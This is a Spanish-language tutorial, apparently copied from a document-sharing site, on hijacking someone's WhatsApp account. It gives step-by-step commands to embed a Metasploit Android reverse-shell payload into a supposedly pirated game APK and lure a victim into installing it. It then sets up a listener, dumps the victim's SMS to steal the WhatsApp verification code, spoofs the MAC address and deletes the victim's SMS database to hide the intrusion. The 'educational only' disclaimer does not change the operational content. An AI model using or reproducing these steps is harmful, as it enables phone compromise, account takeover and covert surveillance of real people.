Sunteți pe pagina 1din 6

Atención: este es un método de último recurso.

Este tutorial es solo para fines educativos, y este método no compromete


el uso de WhatsApp.
Lo que vamos a hacer primero es insertar una carga útil de metasploit en
una aplicación original.
Hay algunas bibliotecas necesarias para
que las escriba en la consola de metasploit
apt-get install lib32stdc ++ 6 lib32ncurses5 lib32z1

después de que haya terminado con la instalación de las bibliotecas


diríjase a este enlace y clónelo
para hacer ese tipo en su terminal
git clone https://github.com/SkullTech/apk-payload-injector
El siguiente paso es una especie de preferencia personal

En este escenario, a la víctima le gusta jugar al billar de 8 bolas, así que


voy a insertar mi carga en un apk 8ball pool y se lo enviaré a la víctima
después de convencerlo de que es la "versión pirateada" y que tiene
millones de monedas, etc.

Después de descargar la aplicación que prefiera,


asegúrese de colocar tanto la apk como la secuencia de comandos que
descargó anteriormente en el mismo directorio,
luego vaya a la terminal y escriba
ruby apk-embed-payload.rb apkYouDownload.apk -p android /
meterpreter / reverse_tcp LHOST = xxx.xxx.x.xxx LPORT = xxxx
( guardé los archivos en el directorio raíz para no tener que especificar una
ruta)
LHOST y LPORT son la ip y el puerto al que se conectará el medidor
(si Quiero hacer esto con wan asegúrate de configurar tu IP público como
LHOST y reenviar el puerto que proporcionaste).
todo lo que queda por hacer es configurar al oyente, enviando el apk y, por
supuesto, esperando.
para configurar el oyente abra metasploit escribiendo msfconsole en una
terminal
ahora ingrese los siguientes "comandos":
use multi / handler
set payload android / meterpreter / reverse_tcp
set LHOST {local ip para escuchar en}
set LPORT {el puerto que estableció anteriormente}
exploit
Ahora envíe el apk a la víctima
cuando la víctima abra la aplicación infectada, obtendremos una sesión,
luego
instalaremos WhatsApp en un teléfono que no esté utilizando
al crear la cuenta de
WhatsApp
, colocaremos el número de la víctima en espera unos 30 segundos y luego
usaremos el comando drop_sms
Se creará un archivo en el directorio raíz que contenga todos los sms de
esa persona.
Verifique el que se envió desde WhatsApp.
Copie ese código y péguelo en la verificación de WhatsApp en su teléfono.
# 1, la persona notará directamente que alguien está usando su cuenta de
whatsapp, ya que se le pedirá que verifique whatsapp cada vez que intente
cargar la aplicación

para eliminar los riesgos de que la persona se dé cuenta de que ha sido


pirateado, obtenga la dirección MAC de su teléfono y colóquela como la
dirección MAC del teléfono que está utilizando en este truco antes de iniciar
sesión en su WhatsApp

(rootee el teléfono y simplemente falsifique la dirección MAC usando un


terminal, descárguelo de playstore como termux)

si haces esto, solo podrá notar que hay algo sospechoso si ve ese sms,
pero este problema se resuelve si ha rooteado su teléfono, ya que podrás
eliminar su sms db,
usa este comando para
borrar los datos
/data/com.android.providers.telephony/databases/mmssms.db
obviamente no podrá ver los mensajes anteriores.
propósito de este tutorial y fuentes
podría haber algunos métodos mejores para lograr lo que estamos
haciendo aquí, pero ese no es el propósito de este tutorial

como habrás notado, este tutorial mezcla muchas cosas futuras en


tutoriales anteriores

El propósito de este tutorial es para enseñarle todas estas técnicas en un


tutorial fácil y comprensible, y hacer crecer la habilidad más importante que
un hacker debe tener: ser capaz de crear soluciones para piratear las cosas
con el conocimiento que hemos reunido a lo largo del año.

S-ar putea să vă placă și